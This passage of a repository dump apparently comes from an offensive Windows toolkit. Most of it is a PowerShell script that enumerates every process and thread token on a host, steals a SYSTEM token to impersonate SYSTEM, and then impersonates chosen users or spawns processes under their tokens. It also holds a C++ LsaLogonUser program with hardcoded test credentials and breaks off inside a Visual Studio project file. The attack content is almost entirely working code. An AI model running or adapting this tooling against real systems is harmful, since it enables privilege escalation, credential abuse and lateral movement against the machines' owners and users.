[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenSessionIdPtr)\n\n\n                    #Query the token privileges\n                    $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesEnabled -Value @()\n                    $ReturnObj | Add-Member -Type NoteProperty -Name PrivilegesAvailable -Value @()\n\n                    [UInt32]$TokenPrivilegesSize = 1000\n                    [IntPtr]$TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivilegesSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenPrivileges, $TokenPrivilegesPtr, $TokenPrivilegesSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n                        \n                        #Loop through each privilege\n                        [IntPtr]$PrivilegesBasePtr = [IntPtr](Add-SignedIntAsUnsigned $TokenPrivilegesPtr ([System.Runtime.InteropServices.Marshal]::OffsetOf([Type]$TOKEN_PRIVILEGES, \"Privileges\")))\n                        $LuidAndAttributeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n                        for ($i = 0; $i -lt $TokenPrivileges.PrivilegeCount; $i++)\n                        {\n                            $LuidAndAttributePtr = [IntPtr](Add-SignedIntAsUnsigned $PrivilegesBasePtr ($LuidAndAttributeSize * $i))\n\n                            $LuidAndAttribute = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributePtr, [Type]$LUID_AND_ATTRIBUTES)\n\n                            #Lookup privilege name\n                            [UInt32]$PrivilegeNameSize = 60\n                            $PrivilegeNamePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PrivilegeNameSize)\n                            $PLuid = $LuidAndAttributePtr #The Luid structure is the first object in the LuidAndAttributes structure, so a ptr to LuidAndAttributes also points to Luid\n\n                            $Success = $LookupPrivilegeNameW.Invoke([IntPtr]::Zero, $PLuid, $PrivilegeNamePtr, [Ref]$PrivilegeNameSize)\n                            if (-not $Success)\n                            {\n                                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                                Write-Warning \"Call to LookupPrivilegeNameW failed. Error code: $ErrorCode. RealSize: $PrivilegeNameSize\"\n                            }\n                            $PrivilegeName = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($PrivilegeNamePtr)\n\n                            #Get the privilege attributes\n                            $PrivilegeStatus = \"\"\n                            $Enabled = $false\n\n                            if ($LuidAndAttribute.Attributes -eq 0)\n                            {\n                                $Enabled = $false\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) -eq $Win32Constants.SE_PRIVILEGE_ENABLED_BY_DEFAULT) #enabled by default\n                            {\n                                $Enabled = $true\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_ENABLED) -eq $Win32Constants.SE_PRIVILEGE_ENABLED) #enabled\n                            {\n                                $Enabled = $true\n                            }\n                            if (($LuidAndAttribute.Attributes -band $Win32Constants.SE_PRIVILEGE_REMOVED) -eq $Win32Constants.SE_PRIVILEGE_REMOVED) #SE_PRIVILEGE_REMOVED. This should never exist. Write a warning if it is found so I can investigate why/how it was found.\n                            {\n                                Write-Warning \"Unexpected behavior: Found a token with SE_PRIVILEGE_REMOVED. Please report this as a bug. \"\n                            }\n\n                            if ($Enabled)\n                            {\n                                $ReturnObj.PrivilegesEnabled += ,$PrivilegeName\n                            }\n                            else\n                            {\n                                $ReturnObj.PrivilegesAvailable += ,$PrivilegeName\n                            }\n\n                            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($PrivilegeNamePtr)\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\n                }\n                else\n                {\n                    Write-Verbose \"Call to LsaGetLogonSessionData succeeded. This SHOULD be SYSTEM since there is no data. $($LogonSessionData.UserName.Length)\"\n                }\n\n                #Free LogonSessionData\n                $ntstatus = $LsaFreeReturnBuffer.Invoke($LogonSessionDataPtr)\n                $LogonSessionDataPtr = [IntPtr]::Zero\n                if ($ntstatus -ne 0)\n                {\n                    Write-Warning \"Call to LsaFreeReturnBuffer failed. Error code: $ntstatus\"\n                }\n            }\n\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n            $LuidPtr = [IntPtr]::Zero\n        }\n\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenStatsPtr)\n        $TokenStatsPtr = [IntPtr]::Zero\n\n        return $ReturnObj\n    }\n\n\n    #Takes an array of TokenObjects built by the script and returns the unique ones\n    function Get-UniqueTokens\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [Object[]]\n            $AllTokens\n        )\n\n        $TokenByUser = @{}\n        $TokenByEnabledPriv = @{}\n        $TokenByAvailablePriv = @{}\n\n        #Filter tokens by user\n        foreach ($Token in $AllTokens)\n        {\n            $Key = $Token.Domain + \"\\\" + $Token.Username\n            if (-not $TokenByUser.ContainsKey($Key))\n            {\n                #Filter out network logons and junk Windows accounts. This filter eliminates accounts which won't have creds because\n                #    they are network logons (type 3) or logons for which the creds don't matter like LOCOAL SERVICE, DWM, etc..\n                if ($Token.LogonType -ne 3 -and\n                    $Token.Username -inotmatch \"^DWM-\\d+$\" -and\n                    $Token.Username -inotmatch \"^LOCAL\\sSERVICE$\")\n                {\n                    $TokenByUser.Add($Key, $Token)\n                }\n            }\n            else\n            {\n                #If Tokens have equal elevation levels, compare their privileges.\n                if($Token.IsElevated -eq $TokenByUser[$Key].IsElevated)\n                {\n                    if (($Token.PrivilegesEnabled.Count + $Token.PrivilegesAvailable.Count) -gt ($TokenByUser[$Key].PrivilegesEnabled.Count + $TokenByUser[$Key].PrivilegesAvailable.Count))\n                    {\n                        $TokenByUser[$Key] = $Token\n                    }\n                }\n                #If the new token is elevated and the current token isn't, use the new token\n                elseif (($Token.IsElevated -eq $true) -and ($TokenByUser[$Key].IsElevated -eq $false))\n                {\n                    $TokenByUser[$Key] = $Token\n                }\n            }\n        }\n\n        #Filter tokens by privilege\n        foreach ($Token in $AllTokens)\n        {\n            $Fullname = \"$($Token.Domain)\\$($Token.Username)\"\n\n            #Filter currently enabled privileges\n            foreach ($Privilege in $Token.PrivilegesEnabled)\n            {\n                if ($TokenByEnabledPriv.ContainsKey($Privilege))\n                {\n                    if($TokenByEnabledPriv[$Privilege] -notcontains $Fullname)\n                    {\n                        $TokenByEnabledPriv[$Privilege] += ,$Fullname\n                    }\n                }\n                else\n                {\n                    $TokenByEnabledPriv.Add($Privilege, @($Fullname))\n                }\n            }\n\n            #Filter currently available (but not enable) privileges\n            foreach ($Privilege in $Token.PrivilegesAvailable)\n            {\n                if ($TokenByAvailablePriv.ContainsKey($Privilege))\n                {\n                    if($TokenByAvailablePriv[$Privilege] -notcontains $Fullname)\n                    {\n                        $TokenByAvailablePriv[$Privilege] += ,$Fullname\n                    }\n                }\n                else\n                {\n                    $TokenByAvailablePriv.Add($Privilege, @($Fullname))\n                }\n            }\n        }\n\n        $ReturnDict = @{\n            TokenByUser = $TokenByUser\n            TokenByEnabledPriv = $TokenByEnabledPriv\n            TokenByAvailablePriv = $TokenByAvailablePriv\n        }\n\n        return (New-Object PSObject -Property $ReturnDict)\n    }\n\n\n    function Invoke-ImpersonateUser\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken\n        )\n\n        #Duplicate the token so it can be used to create a new process\n        [IntPtr]$NewHToken = [IntPtr]::Zero\n        $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken) #todo does this need to be freed\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"DuplicateTokenEx failed. ErrorCode: $ErrorCode\"\n        }\n        else\n        {\n            $Success = $ImpersonateLoggedOnUser.Invoke($NewHToken)\n            if (-not $Success)\n            {\n                $Errorcode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to ImpersonateLoggedOnUser. Error code: $Errorcode\"\n            }\n        }\n\n        $Success = $CloseHandle.Invoke($NewHToken)\n        $NewHToken = [IntPtr]::Zero\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode\"\n        }\n\n        return $Success\n    }\n\n\n    function Create-ProcessWithToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken,\n\n            [Parameter(Position=1, Mandatory=$true)]\n            [String]\n            $ProcessName,\n\n            [Parameter(Position=2)]\n            [String]\n            $ProcessArgs,\n\n            [Parameter(Position=3)]\n            [Switch]\n            $PassThru\n        )\n        Write-Verbose \"Entering Create-ProcessWithToken\"\n        #Duplicate the token so it can be used to create a new process\n        [IntPtr]$NewHToken = [IntPtr]::Zero\n        $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken)\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"DuplicateTokenEx failed. ErrorCode: $ErrorCode\"\n        }\n        else\n        {\n            $StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO)\n            [IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize)\n            $memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null\n            [System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) #The first parameter (cb) is a DWORD which is the size of the struct\n\n            $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION)\n            [IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize)\n\n            $ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"$ProcessName\")\n            $ProcessArgsPtr = [IntPtr]::Zero\n            if (-not [String]::IsNullOrEmpty($ProcessArgs))\n            {\n                $ProcessArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"`\"$ProcessName`\" $ProcessArgs\")\n            }\n            \n            $FunctionName = \"\"\n            if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0)\n            {\n                #Cannot use CreateProcessWithTokenW when in Session0 because CreateProcessWithTokenW throws an ACCESS_DENIED error. I believe it is because\n                #this API attempts to modify the desktop ACL. I would just use this API all the time, but it requires that I enable SeAssignPrimaryTokenPrivilege\n                #which is not ideal. \n                Write-Verbose \"Running in Session 0. Enabling SeAssignPrimaryTokenPrivilege and calling CreateProcessAsUserW to create a process with alternate token.\"\n                Enable-Privilege -Privilege SeAssignPrimaryTokenPrivilege\n                $Success = $CreateProcessAsUserW.Invoke($NewHToken, $ProcessNamePtr, $ProcessArgsPtr, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr)\n                $FunctionName = \"CreateProcessAsUserW\"\n            }\n            else\n            {\n                Write-Verbose \"Not running in Session 0, calling CreateProcessWithTokenW to create a process with alternate token.\"\n                $Success = $CreateProcessWithTokenW.Invoke($NewHToken, 0x0, $ProcessNamePtr, $ProcessArgsPtr, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr)\n                $FunctionName = \"CreateProcessWithTokenW\"\n            }\n            if ($Success)\n            {\n                #Free the handles returned in the ProcessInfo structure\n                $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION)\n                $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null\n                $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null\n\n\t\t#Pass created System.Diagnostics.Process object to pipeline\n\t\tif ($PassThru) {\n\t\t\t#Retrieving created System.Diagnostics.Process object\n\t\t\t$returnProcess = Get-Process -Id $ProcessInfo.dwProcessId\n\n\t\t\t#Caching process handle so we don't lose it when the process exits\n\t\t\t$null = $returnProcess.Handle\n\n\t\t\t#Passing System.Diagnostics.Process object to pipeline\n\t\t\t$returnProcess\n\t\t}\n            }\n            else\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"$FunctionName failed. Error code: $ErrorCode\"\n            }\n\n            #Free StartupInfo memory and ProcessInfo memory\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($StartupInfoPtr)\n            $StartupInfoPtr = [Intptr]::Zero\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessInfoPtr)\n            $ProcessInfoPtr = [IntPtr]::Zero\n            [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($ProcessNamePtr)\n            $ProcessNamePtr = [IntPtr]::Zero\n\n            #Close handle for the token duplicated with DuplicateTokenEx\n            $Success = $CloseHandle.Invoke($NewHToken)\n            $NewHToken = [IntPtr]::Zero\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode\"\n            }\n        }\n    }\n\n\n    function Free-AllTokens\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [PSObject[]]\n            $TokenInfoObjs\n        )\n\n        foreach ($Obj in $TokenInfoObjs)\n        {\n            $Success = $CloseHandle.Invoke($Obj.hToken)\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Verbose \"Failed to close token handle in Free-AllTokens. ErrorCode: $ErrorCode\"\n            }\n            $Obj.hToken = [IntPtr]::Zero\n        }\n    }\n\n\n    #Enumerate all tokens on the system. Returns an array of objects with the token and information about the token.\n    function Enum-AllTokens\n    {\n        $AllTokens = @()\n\n        #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token.\n        #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges.\n        #We need to enumrate all processes running as SYSTEM and find one that we can use.\n        [string]$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value\n        \n        $SystemTokens = Get-WmiObject -Class Win32_Process | ForEach-Object {\n            $OwnerInfo = $_.GetOwner()\n\n            if ($OwnerInfo.Domain -and $OwnerInfo.User) {\n                $OwnerString = \"$($OwnerInfo.Domain)\\$($OwnerInfo.User)\".ToUpper()\n\n                if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) {\n                    $_\n                }\n            }\n        }\n\n        ForEach ($SystemToken in $SystemTokens)\n        {\n            $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.ProcessId -WarningAction SilentlyContinue -ErrorAction SilentlyContinue\n            if ($SystemTokenInfo) { break }\n        }\n        if ($SystemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))\n        {\n            Write-Warning \"Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens\"\n        }\n\n        if ($SystemTokenInfo -ne $null -and $SystemTokenInfo.hProcToken -ne [IntPtr]::Zero)\n        {\n            $CloseHandle.Invoke($SystemTokenInfo.hProcToken) | Out-Null\n            $SystemTokenInfo = $null\n        }\n\n        $ProcessIds = get-process | where {$_.name -inotmatch \"^csrss$\" -and $_.name -inotmatch \"^system$\" -and $_.id -ne 0}\n\n        #Get all tokens\n        foreach ($Process in $ProcessIds)\n        {\n            $PrimaryTokenInfo = (Get-PrimaryToken -ProcessId $Process.Id -FullPrivs)\n\n            #If a process is a protected process, it's primary token cannot be obtained. Don't try to enumerate it.\n            if ($PrimaryTokenInfo -ne $null)\n            {\n                [IntPtr]$hToken = [IntPtr]$PrimaryTokenInfo.hProcToken\n\n                if ($hToken -ne [IntPtr]::Zero)\n                {\n                    #Get the LUID corrosponding to the logon\n                    $ReturnObj = Get-TokenInformation -hToken $hToken\n                    if ($ReturnObj -ne $null)\n                    {\n                        $ReturnObj | Add-Member -MemberType NoteProperty -Name ProcessId -Value $Process.Id\n\n                        $AllTokens += $ReturnObj\n                    }\n                }\n                else\n                {\n                    Write-Warning \"Couldn't retrieve token for Process: $($Process.Name). ProcessId: $($Process.Id)\"\n                }\n\n                foreach ($Thread in $Process.Threads)\n                {\n                    $ThreadTokenInfo = Get-ThreadToken -ThreadId $Thread.Id\n                    [IntPtr]$hToken = ($ThreadTokenInfo.hThreadToken)\n\n                    if ($hToken -ne [IntPtr]::Zero)\n                    {\n                        $ReturnObj = Get-TokenInformation -hToken $hToken\n                        if ($ReturnObj -ne $null)\n                        {\n                            $ReturnObj | Add-Member -MemberType NoteProperty -Name ThreadId -Value $Thread.Id\n                    \n                            $AllTokens += $ReturnObj\n                        }\n                    }\n                }\n            }\n        }\n\n        return $AllTokens\n    }\n\n\n    function Invoke-RevertToSelf\n    {\n        Param(\n            [Parameter(Position=0)]\n            [Switch]\n            $ShowOutput\n        )\n\n        $Success = $RevertToSelf.Invoke()\n\n        if ($ShowOutput)\n        {\n            if ($Success)\n            {\n                Write-Output \"RevertToSelf was successful. Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n            else\n            {\n                Write-Output \"RevertToSelf failed. Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n        }\n    }\n\n\n    #Main function\n    function Main\n    {\n        if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\"))\n        {\n            Write-Error \"Script must be run as administrator\" -ErrorAction Stop\n        }\n\n        #If running in session 0, force NoUI\n        if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0)\n        {\n            Write-Verbose \"Running in Session 0, forcing NoUI (processes in Session 0 cannot have a UI)\"\n            $NoUI = $true\n        }\n\n        if ($PsCmdlet.ParameterSetName -ieq \"RevToSelf\")\n        {\n            Invoke-RevertToSelf -ShowOutput\n        }\n        elseif ($PsCmdlet.ParameterSetName -ieq \"CreateProcess\" -or $PsCmdlet.ParameterSetName -ieq \"ImpersonateUser\")\n        {\n            $AllTokens = Enum-AllTokens\n            \n            #Select the token to use\n            [IntPtr]$hToken = [IntPtr]::Zero\n            $UniqueTokens = (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser\n            if ($Username -ne $null -and $Username -ne '')\n            {\n                if ($UniqueTokens.ContainsKey($Username))\n                {\n                    $hToken = $UniqueTokens[$Username].hToken\n                    Write-Verbose \"Selecting token by username\"\n                }\n                else\n                {\n                    Write-Error \"A token belonging to the specified username was not found. Username: $($Username)\" -ErrorAction Stop\n                }\n            }\n            elseif ( $ProcessId -ne $null -and $ProcessId -ne 0)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $ProcessId)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by ProcessID\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to ProcessId $($ProcessId) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            elseif ($ThreadId -ne $null -and $ThreadId -ne 0)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ThreadId) -and $Token.ThreadId -eq $ThreadId)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by ThreadId\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to ThreadId $($ThreadId) could not be found. Either the thread doesn't exist or the thread is in a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            elseif ($Process -ne $null)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $Process.Id)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by Process object\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to Process $($Process.Name) ProcessId $($Process.Id) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            else\n            {\n                Write-Error \"Must supply a Username, ProcessId, ThreadId, or Process object\"  -ErrorAction Stop\n            }\n\n            #Use the token for the selected action\n            if ($PsCmdlet.ParameterSetName -ieq \"CreateProcess\")\n            {\n                if (-not $NoUI)\n                {\n                    Set-DesktopACLs\n                }\n\n                Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru\n\n                Invoke-RevertToSelf\n            }\n            elseif ($ImpersonateUser)\n            {\n                Invoke-ImpersonateUser -hToken $hToken | Out-Null\n                Write-Output \"Running As: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n\n            Free-AllTokens -TokenInfoObjs $AllTokens\n        }\n        elseif ($PsCmdlet.ParameterSetName -ieq \"WhoAmI\")\n        {\n            Write-Output \"$([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n        }\n        else #Enumerate tokens\n        {\n            $AllTokens = Enum-AllTokens\n\n            if ($PsCmdlet.ParameterSetName -ieq \"ShowAll\")\n            {\n                Write-Output $AllTokens\n            }\n            else\n            {\n                Write-Output (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser.Values\n            }\n\n            Invoke-RevertToSelf\n\n            Free-AllTokens -TokenInfoObjs $AllTokens\n        }\n    }\n\n\n    #Start the main function\n    Main\n}\n"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp",
    "content": "// LogonUser.cpp : Defines the entry point for the console application.\n//\n\n#include \"stdafx.h\"\n\nusing namespace std;\n\nsize_t wcsByteLen( const wchar_t* str );\nvoid InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );\nPVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);\nsize_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n\t//Get a handle to LSA\n\tHANDLE hLSA = NULL;\n\tNTSTATUS status = LsaConnectUntrusted(&hLSA);\n\tif (status != 0)\n\t{\n\t\tcout << \"Error calling LsaConnectUntrusted. Error code: \" << status << endl;\n\t\treturn -1;\n\t}\n\tif (hLSA == NULL)\n\t{\n\t\tcout << \"hLSA is NULL, this shouldn't ever happen\" << endl;\n\t\treturn -1;\n\t}\n\n\t//Build LsaLogonUser parameters\n\tLSA_STRING originName = {};\n\tchar originNameStr[] = \"qpqp\";\n\toriginName.Buffer = originNameStr;\n\toriginName.Length = (USHORT)strlen(originNameStr);\n\toriginName.MaximumLength = originName.Length;\n\n\tULONG authPackage = 0;\n\tPLSA_STRING authPackageName = new LSA_STRING();\n\tchar authPackageBuf[] = MSV1_0_PACKAGE_NAME;\n\tauthPackageName->Buffer = authPackageBuf;\n\tauthPackageName->Length = (USHORT)strlen(authPackageBuf);\n\tauthPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);\n\tstatus = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);\n\tif (status != 0)\n\t{\n\t\tint winError = LsaNtStatusToWinError(status);\n\t\tcout << \"Call to LsaLookupAuthenticationPackage failed. Error code: \" << winError;\n\t\treturn -1;\n\t}\n\n\tDWORD authBufferSize = 0;\n\tPVOID authBuffer = CreateNtlmLogonStructure(L\"VMWORKSTATION\", L\"testuser\", L\"Password1\", &authBufferSize);\n\t\tcout << \"authBufferSize: \" << authBufferSize << endl;\n\n\t//Get TokenSource\n\tHANDLE hProcess = GetCurrentProcess();//todo\n\tHANDLE procToken = NULL;\n\tBOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);\n\tif (!success)\n\t{\n\t\tDWORD errorCode = GetLastError();\n\t\tcout << \"Call to OpenProcessToken failed. Errorcode: \" << errorCode << endl;\n\t\treturn -1;\n\t}\n\n\tTOKEN_SOURCE tokenSource = {};\n\tDWORD realSize = 0;\n\tsuccess = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);\n\tif (!success)\n\t{\n\t\tcout << \"Call to GetTokenInformation failed.\" << endl;\n\t\treturn -1;\n\t}\n\n\n\t//Misc\n\tPVOID profileBuffer = NULL;\n\tULONG profileBufferSize = 0;\n\tLUID loginId;\n\tHANDLE token = NULL;\n\tQUOTA_LIMITS quotaLimits;\n\tNTSTATUS subStatus = 0;\n\n\tstatus = LsaLogonUser(hLSA, \n\t\t&originName, \n\t\tRemoteInteractive, \n\t\tauthPackage, \n\t\tauthBuffer,\n\t\tauthBufferSize, \n\t\t0, \n\t\t&tokenSource, \n\t\t&profileBuffer,\n\t\t&profileBufferSize,\n\t\t&loginId,\n\t\t&token,\n\t\t&quotaLimits,\n\t\t&subStatus);\n\n\tif (status != 0)\n\t{\n\t\tNTSTATUS winError = LsaNtStatusToWinError(status);\n\t\tcout << \"Error calling LsaLogonUser. Error code: \" << winError << endl;\n\t\treturn -1;\n\t}\n\n\tcout << \"Success!\" << endl;\n\n\treturn 1;\n}\n\n//size will be set to the size of the structure created\nPVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)\n{\n\tsize_t wcharSize = sizeof(wchar_t);\n\n\tsize_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize);\n\tMSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);\n\tsize_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON);\n\n\tntlmLogon->MessageType = MsV1_0InteractiveLogon;\n\toffset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset);\n\toffset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset);\n\toffset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset);\n\n\t*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.\n\treturn ntlmLogon;\n}\n\nsize_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)\n{\n\tconst wchar_t* buffer = str.c_str();\n\tsize_t size = str.length() * sizeof(wchar_t);\n\tuniStr->Length = (USHORT)size;\n\tuniStr->MaximumLength = (USHORT)size;\n\tuniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset);\n\tmemcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size);\n\treturn size;\n}"
  },
  {
    "path": "Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>LogonUser</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    